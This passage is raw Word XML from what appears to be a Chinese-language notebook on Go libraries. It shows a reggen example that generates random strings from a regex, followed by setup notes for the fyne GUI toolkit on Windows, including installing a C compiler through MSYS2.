    <w:p w14:paraId="3EFE7818" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43520B28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D82E096" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EEB946" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// generate a single string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4146AA04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>str, err := reggen.Generate("^[a-z]{5,10}@[a-z]{5,10}\\.(com|net|org)$", 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF53165" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F74D6A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>panic(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B4173" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA9386" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(str)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A3EBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B5C84E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>// create a reusable generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D2248B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>g, err := reggen.NewGenerator("[01]{5}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D0918E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246CE31B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>panic(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00515994" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE64347" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BAFE3B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for i := 0; i &lt; 5; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BEF0EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// 10 is the maximum number of times star, range or plus should repeat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D2544" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>// i.e. [0-9]+ will generate at most 10 characters if this is set to 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FB5688" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的意思是，反贪婪模式，如上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> [0-9]+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>可以标识</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>个及以上，这里就限制最多是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C33550D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(g.Generate(10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5852D606" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE97938" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB9CE62" w14:textId="77777777" w:rsidR="0038204E" w:rsidRDefault="0038204E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139E788C" w14:textId="77777777" w:rsidR="0038204E" w:rsidRDefault="0038204E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4275E744" w14:textId="1809E592" w:rsidR="0038204E" w:rsidRDefault="0038204E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="376" w:name="_Toc159779827"/>
      <w:r w:rsidRPr="0038204E">
        <w:t>github.com/fyne-io/fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：跨平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="376"/>
    </w:p>
    <w:p w14:paraId="69B7FAE8" w14:textId="318E1603" w:rsidR="0038204E" w:rsidRDefault="0038204E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId115" w:history="1">
        <w:r w:rsidR="0038719B" w:rsidRPr="00251149">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://github.com/fyne-io/fyne</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CFE8B92" w14:textId="71D88D84" w:rsidR="0038204E" w:rsidRPr="00934220" w:rsidRDefault="0038204E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00934220">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>入门教程：</w:t>
      </w:r>
      <w:r w:rsidRPr="00934220">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://developer.fyne.io/started/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CD7146" w14:textId="77777777" w:rsidR="0038204E" w:rsidRDefault="0038204E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49BD8246" w14:textId="77777777" w:rsidR="0038204E" w:rsidRDefault="0038204E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3782C741" w14:textId="09216D18" w:rsidR="0038204E" w:rsidRDefault="0038204E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B87BCD" w14:textId="77777777" w:rsidR="008B3C40" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16644644" w14:textId="7361685F" w:rsidR="008B3C40" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器，选择其一即可，此处我使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msys</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228F3E57" w14:textId="77E90B5A" w:rsidR="0038204E" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0038204E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSYS</w:t>
      </w:r>
      <w:r w:rsidR="0038204E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0038204E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="0038204E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ming</w:t>
      </w:r>
      <w:r w:rsidR="0038204E">
        <w:t>W-w64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0860D632" w14:textId="4224675B" w:rsidR="008B3C40" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId116" w:history="1">
        <w:r w:rsidRPr="00052F00">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://www.msys2.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F35FA70" w14:textId="2F756F7A" w:rsidR="0038204E" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0038204E">
        <w:t xml:space="preserve"> TDM-GCC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11257445" w14:textId="4D806B15" w:rsidR="0038204E" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="0038204E">
        <w:t xml:space="preserve"> Cygwin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A643966" w14:textId="77777777" w:rsidR="0038204E" w:rsidRPr="008B3C40" w:rsidRDefault="0038204E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6C0101" w14:textId="4D453725" w:rsidR="008B3C40" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，您的图形驱动程序已安装，但建议确保它们是最新的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BADA1AE" w14:textId="77777777" w:rsidR="008B3C40" w:rsidRPr="008B3C40" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1EF806" w14:textId="3D836D0E" w:rsidR="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msys</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A76DC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：需要单独从菜单打开</w:t>
      </w:r>
      <w:r w:rsidR="00A76DC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00A76DC6">
        <w:t>ingw64</w:t>
      </w:r>
      <w:r w:rsidR="00A76DC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00A76DC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336E2245" w14:textId="77777777" w:rsidR="002F5AB7" w:rsidRDefault="002F5AB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3344AAC7" w14:textId="0635A84E" w:rsidR="002F5AB7" w:rsidRDefault="002F5AB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用法参考：</w:t>
      </w:r>
      <w:r w:rsidRPr="002F5AB7">
        <w:t>https://blog.csdn.net/hustlei/article/details/86687621</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3DFB42" w14:textId="77777777" w:rsidR="002F5AB7" w:rsidRPr="002F5AB7" w:rsidRDefault="002F5AB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06700307" w14:textId="778FDD6C" w:rsidR="0038204E" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sys2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>操作系统的软件包管理系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的后续版本，给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>unix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>集成了</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> pacman </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mingw-w64</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cygwin </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>升级版。与</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MSYS </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最大的区别是移植了</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pacman</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E12191" w14:textId="77777777" w:rsidR="0038204E" w:rsidRDefault="0038204E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5E6E40" w14:textId="47136210" w:rsidR="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MSYS2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MSYS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Minimal SYStem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
